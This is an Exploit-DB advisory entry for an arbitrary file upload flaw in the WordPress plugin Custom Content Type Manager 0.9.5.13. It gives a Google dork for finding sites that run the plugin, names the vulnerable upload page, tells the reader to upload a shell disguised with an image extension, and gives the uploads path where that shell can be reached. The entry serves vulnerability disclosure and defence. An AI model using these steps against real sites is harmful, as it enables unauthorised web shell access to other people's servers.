WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload

Author: Adrien Thierry
type: webapps
platform: php
port: 
date_added: 2012-06-11  
date_updated: 2012-06-11  
verified: 1  
codes: OSVDB-82904  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcustom-content-type-manager.0.9.5.13.zip  

raw file: 19058.txt  
###########################################################
#
# Exploit Title: Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/custom-content-type-manager/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://www.fireproofsocks.com/
# Software Link: http://downloads.wordpress.org/plugin/custom-content-type-manager.0.9.5.13.zip
# Version: 0.9.5.13
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php

exploit :

http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php

	-> upload your shell with image ext (jpg|png|gif)

shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg

#####################################################################